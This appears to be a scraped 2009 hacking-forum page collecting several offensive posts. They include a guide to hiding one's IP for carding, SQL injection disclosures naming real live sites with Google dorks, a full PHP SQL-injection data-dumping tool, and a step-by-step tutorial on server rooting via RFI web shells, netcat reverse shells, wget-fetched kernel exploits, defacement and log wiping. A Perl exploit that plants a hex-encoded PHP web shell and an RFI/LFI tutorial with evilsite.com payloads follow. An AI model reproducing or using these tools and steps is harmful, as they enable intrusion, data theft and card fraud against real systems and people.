If you got a page with GREEN and you can add your description on your "car" than your ip is not blacklisted and can be used to a very fucked up site that have the biggest security in the world and YOU can card that site :D I made testes so i am sure about what I am saying :P

=================================

2. Local IP > VPN

www.findnot.com < I used a Japan credit card and i bought it for a year and worked...still working and I am still connected to this
Findnot have many servers all over the world and there are fast servers

3. Local IP > TOR

This tool is more than great if you dont trust me do this test and you will see what TOR can provide :)
Also many of you know that TOR connect every time from different 3 IP from DIfferent country's

So far so good...BUT why if you can Change your First IP and Last IP so every time you will Re-connect just from 1 ip that is in the middle and not from 3.

FOR low internet connections.

So for testing to see HOW private is TOR do this..

first open again from your Local IP [url="http://www.showmyip.com/?version=full"]http://www.showmyip.com/?version=full[/url] > AND down at:

Computer/Device Properties (as of August 21, 2008 07:00 UTC) you will see your computer DATA, than open TOR put as socks 127.0.0.1 TOR port and than OPEN again this website...YOU will see the data from there was changed...SO when you are doing CARDING...even if you are not connected from your IP address and u are using all kind of softwares to change your IP..this DATA will remaine 100% sure in their database if they asking for this data...BUT with TOR...no more information about your computer: Operating System Platform, Screen Width: Screen Height: etc.

Now to easy your things and also using TOR on all the softwares you are open use

Proxifier, So first open TOR connect to TOR network than Open proxifier add in proxifier 127.0.0.1:TORport and than. Open Firefox or Iexplore BUT dont click on socks let them choice ip from local..and you will see IP Proxifier take ip from TOR

=============================

Now for those who are fucked up on their mind and are very well scared...You can use this:

Local IP > VPN > Proxifier + TOR + Remote desktop connection or socks or anything u guys want. AOL or CS wont work with Proxifier + tor

or

Local IP > VPN > AOL > TOR and u can change tor's last ip every time u want but modify the config


====

Usualy i use just VPN but if I want to do something or to enter to a private network than I use Local IP > VPN > Proxifier + TOR + something else :D

Hope I have helped you a little bit with this tutorial.

p.s: dont use socks or proxy... from LOCAL IP > socks ...this is shit. use LOCAL IP > VPN or TOR > socks :D much more safe than just with socks on local ip even if ur connection is slow try to find a good VPN and than to a socks or proxy


Have Fun on carding/hacking/cracking/ or whatever u guys are doing and want to hide ur ip :D[u][/u]

Read More

Happy Eid-Ul Fitr 1430

Words by words here might hurt you once even more. In case, We need to apologize to you on it.



Translation (lol) :

SAYA MATTHEWS MENGUCAPKAN

SELAMAT HARI RAYA IDUL FITRI 1430 H

MOHON MAAF LAHIR BATIN

Read More

IMS SiteManager Blind SQL Injection Vuln

[o]------------------------------------------------------------------------------------[x]
| Blind SQL Injection Vulnerability
|
[o]------------------------------------------------------------------------------------[o]
| Software : IMS SiteManager
|
| Vendor : www.sitemanager.ims.net
|
| Date : 13 sept 2009
|
| Author : zxvf
|
| Contact : paddy[at]antisecurity[dot]org
|
[o]------------------------------------------------------------------------------------[o]

[?] Google Dork

"Powered by IMS SiteManager"

[?] Exploit

http://[site]/index.php?storecategory_id=

[?] Proof of Concept

https://www.rainfordane.com/order/index.php?storecategory_id=247
https://www.downtownmadison.org/store/index.php?storecategory_id=223

[o]------------------------------------------------------------------------------------[x]
| Greetz
|
[o]------------------------------------------------------------------------------------[o]
| AntiSecurity Crew
|
| Mainhack Crew
|
| Nob0dy Crew
|
| c0li, OoN_Boy, NoGe, paman, pizzyroot, noname, angela, eminem, xx_user,
|
| Special for Dipsy
|
| Armageddon Team, and all indonesian hacker!
|
| BeHave oR BeGone !!!
|
[o]------------------------------------------------------------------------------------[o]

Read More

ExpressLink™ SEO Blind SQL Injection Vuln

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Details *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> type :: ( menu_list.php?cid= ) Blind Sql Injection Vulnerability

<>>><<>>> author :: ^s0n_g0ku^

<>>><<>>> Contact :: dh_4n[at]ymail[dot]com

<>>><<>>> Site :: http://xcode.or.id/

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Script information *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> script :: ExpressLink™ SEO

<>>><<>>> Vendor :: http://www.wevioexpress.com/

<>>><<>>> dork :: kreasikan Pikiranmu

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Exploit *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> Exploit ::

http://www.site.com/menu_list.php?cid=381

<>>><<>>> Examp ::

http://www.poloagawa.com/menu_list.php?cid=381+and+1=1 <<< Thrue
http://www.poloagawa.com/menu_list.php?cid=381+and+1=2 <<< false

http://www.empireallergy.com/menu_list.php?cid=1+and+1=1 <<< Thrue
http://www.empireallergy.com/menu_list.php?cid=1+and+1=2 <<< false

<>>><<>>> Admin Login Page ::

http://site.com/admin/

Enjoy That

Read More

BSR Webweaver Version 1.33 /Scripts access restriction bypass

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.
This is the reason this exploit is not called a Directory Listing Exploit !

[*] Exploitation :

[+] http://[host]/scripts/%bg%ae%bg%ae/.exe

Read More

How to Use John the Ripper

In this config we going to use John the Ripper’s password cracker to enhance the security of your server by choosing a proper password for your system. This config assumes that you have already installed John the Ripper’s password cracker. If you haven’t installed it then please go to install Password cracker - John the Ripper now.

Create test user

For testing purposes you should create a testing user “johnripper” with password “password”.

adduser johnripper

Image:johnripper01.jpg

Crack password

John the Ripper’s password cracker needs to access a shadow file in order to be able crack a password. You need to run “john” as superuser “root”. Be sure that John Binary is in your path, or you are in directory where john Binary resides. Try and see how long it will take to crack your super secure password of: “password”

./john -users:johnripper /etc/shadow

Image:johnripper02.jpg

To guess a password in 0 seconds is excellent time. Try making it more difficult and change the password for user “johnripper” to “password1″ and attempt to crack the password again:

Image:johnripper03.jpg

What if you changed the password to “password10″. How long will it take to crack the password now? Who knows, I gave up after 23 hours. Apparently my linuxbox is not as powerful as I thought, if you get a result please let me know.

Image:johnripper04.jpg

Read More

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything

At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/

main: http://grsecurity.net/~spender/therebel.tgz
back: http://milw0rm.com/sploits/2009-therebel.tgz

Read More

IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author : NoGe
Home : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"

Read More

Sourcode sqltools.php

code sql tools

<?
set_time_limit(0);
error_reporting(0);
$fungsi=strip_tags($_POST['fungsi']);
$url=strip_tags($_POST['url']);
$db=strip_tags($_POST['db']);
$table=strip_tags($_POST['table']);
$column=strip_tags($_POST['column']);
$start=strip_tags($_POST['start']);
$stop=strip_tags($_POST['stop']);
  $target=strip_tags($_POST['target']);
  ?>
  <title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
  <head>
  </head>
  <script>
  function show(id){
  document.getElementById(id).style.display="block";
  }
  function hide(id){
  document.getElementById(id).style.display="none";
  }
  function db(){show("db");hide("table");hide("column");hide("dump");hide("findcol");}
  function table(){hide("db");show("table");hide("column");hide("dump");hide("findcol");}
  function column(){hide("db");hide("table");show("column");hide("dump");hide("findcol");}
  function dump(){hide("db");hide("table");hide("column");show("dump");hide("findcol");}
  function findcol(){hide("db");hide("table");hide("column");hide("dump");show("findcol");}
  function help(){alert("This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info");}
  </script>
  <style>
  #db,#table,#column,#dump,#findcol {display:none;}
  </style>
<a href="javascript:findcol();">FindCol</a> |
  <a href="javascript:db();">Database</a> |
  <a href="javascript:table();">Table</a> |
  <a href="javascript:column();">Column</a> |
  <a href="javascript:dump();">Dump</a> |
  <a href="javascript:help();">Help</a> |
  <b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a 
  href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
  <p>

<div id=db>
  <form method=post>
  <input type=hidden name=fungsi value=db>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td><td><td><input type=submit value="Show Databases"></table>
  </form>
  </div>
<div id=table>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=table>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>"><br>
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>"><br>

  <tr><td><td><td><input type=submit value="Show Table"></table>
  </form>
  </div>
<div id=column>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=column>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
  <tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
  <tr><td><td><td><input type=submit value="Show Column"></table>
  </form>
  </div>
<div id=dump>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=dump>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
  <tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
  <tr><td>Column<td> : <td><input name=column value="<?=$column;?>"> ex : email,passwd,card_num
  <tr><td>Start<td> : <td><input name=start value="<?=$start;?>"> **start from field number**
  <tr><td>Stop<td> : <td><input name=stop value="<?=$stop;?>"> **stop field number**
  <tr><td><td><td><input type=submit value="Dump"></table>
  </form>
  </div>
<div id=findcol>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  Target <input name=target size=100 value="<?=$target;?>"><input type=submit value=test>
  </form>
  </div>
<?
/* GET DATABASE NAME */
  if(isset($url) && $fungsi=="db"){
  $countdb="concat(0x6b30706c30,count(schema_name),0x6b30706c30)";
  $showdb="concat(0x6b30706c30,schema_name,0x6b30706c30)";
  $showdb2="+from+information_schema.schemata";
  $end="--";
  //print "$url <br>";
  $url_1=str_replace("k0pl0",$countdb,$url);
  $url_2=$url_1.$showdb2.$end;
  $url_3=str_replace("k0pl0",$showdb,$url);
  $data=file_get_contents($url_2);
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "$jumlah database<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$showdb2."+limit+$i,1".$end;
  $datax=file_get_contents($urlx);
  $namadatabase=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namadatabase <br>";
  flush();
  }
  }

/* GET TABLE NAME */
  if(isset($url) && $fungsi == "table"){
  $query="concat(0x6b30706c30,count(table_name),0x6b30706c30)";
  $next="+from+information_schema.tables";
  $query2="concat(0x6b30706c30,table_name,0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next=$next."+where+table_schema=0x".bin2hex($db);
  }

$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah tables<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$next."+limit+$i,1".$end;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }
// GET COLUMN NAME LIST
  if(isset($url) && $url3 !== "" && isset($table) && $table !== "" && $fungsi == "column"){
  $query="concat(0x6b30706c30,count(column_name),0x6b30706c30)";
  $next="+from+information_schema.columns+where+table_name=0x".bin2hex($table);
  $query2="concat(0x6b30706c30,column_name,0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next=$next."+and+table_schema=0x".bin2hex($db);
  }
$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah Columns<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$next."+limit+$i,1".$end;
  //echo $urlx;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }

// DUMB DATA
  if($fungsi=="dump" && isset($url) && $url !== "" && isset($table) && $table !== "" && isset($column) && $column !=="" ){
  $query="concat(0x6b30706c30,count(*),0x6b30706c30)";
  $next="+from+$table";
  $query2="concat(0x6b30706c30,concat_ws(0x203a20,".$column."),0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next="+from+$db.$table";
  }
$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah data<br>";
  for($i=$start;$i<=$stop;$i++){
  flush();
  $nomor=$i;
  $urlx=$url_3.$next."+limit+$i,1".$end;
  //echo $urlx;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }
// GET MAGIC NUMBER
  if(isset($target) && $taget !== ""){
  echo "trying... 1 ";
  $targetx=$target."-1+union+select+0x6b30706c30";
  $targety=$target."-1+union+select+1";
  $injek="";
  $y="";
  $end="--";
  for($i=1;$i<100;$i++){
  flush();
  $y .= ",".($i+1);
  $oon=($i+1)."oon";
  $hexx=bin2hex($oon);
  $injek.=",0x6b30706c30".$hexx;
  $link=$targetx.$injek;
  $akhir = $link.$end;
  //echo $akhir;
  echo ($i+1)." ";
  $data=file_get_contents($akhir);
  if(eregi("k0pl0",$data)){
  $magicnumber=antara($data,"k0pl0","oon");
  $mbuh=",".$magicnumber.",";
  $zzz=str_replace($mbuh,",k0pl0,",$targety.$y);
  $linkinjek=$targety.$y.$end;
  echo "<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\"_blank\">$linkinjek</a><p><b>info</b><br>";
  $ambilinfo=str_replace("k0pl0","concat(0x6b30706c30,concat_ws(0x3c62723e,concat(0x64617461626173652076657273696f6e203a20,version()),concat(0x64617461626173652075736572203a20,user()),concat(0x6461746162617365206e616d65203a20,database())),0x6b30706c30)",$zzz).$end;
  $datainfo=file_get_contents($ambilinfo);
  $info=antara($datainfo,"k0pl0","k0pl0");
  echo $info;
  break;
  }
  if($i=="99"){echo "<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :)<b></font>";}
  flush();
  }
}

 function antara($string, $start, $end){
  $string = " ".$string;
  $ini = strpos($string,$start);
  if ($ini == 0) return "";
  $ini += strlen($start);
  $len = strpos($string,$end,$ini) - $ini;
  return substr($string,$ini,$len);
 

Read More

Local Root via NetCat

take from BABY CORP



You will need:
Quote:
- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF.Suppose that we have found a site with RFI vulnerability:

Code:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

Code:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname – a in Command line.

To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder

In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way:

We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd

After we will go to the NetCat directory:

Quote:

cd C:\Program Files\Netcat
And we type the following command:
Quote:
nc -n -l -v -p 11456
NetCat respond: listening on [any] 11456 …

In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11456 …

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don’t have the correct permissions.List of the exploits/kernel:

Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

milw0rm (Try Search: “linux kernel”)

Other sites: www.packetstormsecurity.org | www.milw0rm.com or try Googlin’ you can find ‘em all ;-)

We can find writable folders/files by typing:
Code:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type:
Code:

cd /tmp

To download the local root exploit we can use a download command for linux like wget.

For example:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
where http://www.yoursite.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit before the compile)

For the h00lyshit we must type:
Code:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:
Code:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:
Code:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:
Code:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:
Code:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner.

Read More

Agoko CMS <= 0.4 remote commands execution exploit

#!/usr/bin/perl

print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

~;


#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################


use IO::Socket;
use LWP::Simple;


my $host = shift;
my $path = shift || exit(0);


check_shell($host,$path);


sub check_shell() {
my $host = $_[0];
my $path = $_[1] || die $!;

my $packet = "GET /$path/content/shell_vup.php HTTP/1.1\r\n".
"Host: $host\r\n".
"Cookie: bany=love_me\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Connection: close\r\n\r\n";

if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.\n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..\n";
inject_shell($host,$path);
}
}


sub inject_shell() {
my ($host,$path) = @_;

my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72".
"\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45".
"\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28".
"\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73".
"\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73".
"\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64".
"\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73".
"\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28".
"\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20".
"\x20\x20\x20\x20\x3F\x3E\x20";


my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";

my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Cookie: bany=love_me\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($data)."\r\n".
"Connection: close\r\n\r\n".
$data;

if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.\n";
}

}


sub load_cmd() {
my $host = $_[0];
my $path = $_[1];

while (1)
{
print "\nAgoko[shell]:~\$ ";
chomp (my $cmd = );

exit(0) if $cmd =~ /^(exit|quit|out)+$/i;

getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}


sub give_kt() {
my $input = $_[0];
my $heads = $_[1] || die $!;

my $result;
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;

$socket->send($heads);

while (<$socket>) { $result .= $_; }

return $result;
}

Read More

Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08[at]gmail[dot]com
Contents :

1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example
3.2 - How to fix
4) Local File Inclusion
4.0 - Basic example
4.1 - Simple example
4.2 - How to fix
5) Local File Disclosure/Download
5.0 - Basic example
5.1 - Simple example
5.2 - How to fix
6) SQL Injection
6.0 - Basic example
6.1 - Simple example
6.2 - SQL Login Bypass
6.3 - How to fix
7) Insecure Cookie Handling
7.0 - Basic example
7.1 - Simple example
7.2 - How to fix
8) Remote Command Execution
8.0 - Basic example
8.1 - Simple example
8.2 - Advanced example
8.3 - How to fix
9) Remote Code Execution
9.0 - Basic example
9.1 - Simple example
9.2 - How to fix
10) Cross-Site Scripting
10.0 - Basic example
10.1 - Another example
10.2 - Simple example
10.3 - How to fix
11) Authentication Bypass
11.0 - Basic example
11.1 - Via login variable
11.2 - Unprotected Admin CP
11.3 - How to fix
12) Insecure Permissions
12.0 - Basic example
12.1 - Read the users/passwords
12.2 - Download backups
12.3 - INC files
12.4 - How to fix
13) Cross Site Request Forgery
13.0 - Basic example
13.1 - Simple example
13.2 - How to fix
14) Shoutz


1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
examples without the basic example of each category was founded in different scripts.


2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ' " \ and NUL's with a backslash and we don't want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )

How to proceed : First,create a database to be used by different scripts.Install the script on
localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.


3) Remote File Inclusion


- Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )


In PHP is 4 functions through you can include code.

require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include - includes and evaluates the specified file.
include_once - includes and evaluates the specified file during the execution of the script.


3.0 - Basic example


- Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so
you can use "https" or "ftp".

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina;
?>
-----------------------------------------------

- If we access the page we got some errors and some warnings( not pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

- We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Now I will show why some people use ? and %00 after the link to the evil script.

# The "%00"

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
-----------------------------------------------

- So if we will request

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Will not work because the script will try to include http://evilsite.com/evilscript.txt.php

So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
consideration.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.

# The "?"

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'logged=1';
?>
-----------------------------------------------

And the logged=1 will become like a variable.But better use nullbyte.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

The evilscript will be included succesfully.


3.1 - Simple example


Now an example from a script.

- Code snippet from index.php

----------------------------------------------------
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
----------------------------------------------------

We can see that "main_content" variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the "main_content" variable is include.So if we make the
following request :

http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

Our evil script will be successfully included.


3.2 - How to fix


Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .
Another way : filter "http" , "https" , "ftp" and "smb".


4) Local File Inclusion


- Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).

The same functions which let you to include (include,include_once,require,require_once) .


4.0 - Basic example


- Code snippet from test.php

-----------------------------------
$pagina=$_GET['pagina'];
include '/pages/'.$pagina;
?>
-----------------------------------

Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The script will include "/pages/../../../../../../etc/passwd" successfully.

You can use the %00 and ? .The same story.


4.1 - Simple example


- Code snippet from install/install.php

-------------------------------------
if(empty($_GET["url"]))
$url = 'step_welcome.php';
else
$url = $_GET["url"];
.............etc.............

